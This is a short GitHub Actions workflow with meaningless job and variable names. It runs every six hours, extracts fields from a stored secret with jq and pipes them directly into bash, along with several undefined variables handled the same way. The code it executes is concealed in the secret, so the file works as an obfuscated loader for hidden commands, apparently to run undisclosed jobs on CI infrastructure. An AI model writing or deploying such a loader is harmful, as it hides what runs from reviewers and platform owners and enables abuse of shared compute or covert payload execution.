name: xiaxijie6537

on:
  workflow_dispatch:
  schedule:
    - cron: '20 2/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: xiaxijie6537
        env:
          b0394: ${{ secrets.b0394 }}
        run: |
          echo $b0394 | jq -r .unj46698 | /bin/bash
          echo $yit71801 | jq -r .dnfx73 | /bin/bash
          echo $er70 | jq -r .sqqtm7179 | /bin/bash
          echo $e8879 | jq -r .xcml6 | /bin/bash
          echo $cgz168 | jq -r .vd0662 | /bin/bash
          echo $mnxo36 | jq -r .fv7010 | /bin/bash

